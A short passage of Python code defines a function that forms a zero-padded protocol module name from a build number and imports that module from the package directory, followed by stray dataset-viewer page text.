    return _import_protocol(base_path, module_name)
def build(build_version):
    """
    Get the module for a specific build version
    """
    # Protocol files use zero-padded 5-digit build numbers.
    module_name = 'protocol%05d' % build_version
    return _import_protocol(os.path.dirname(__file__), module_name)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.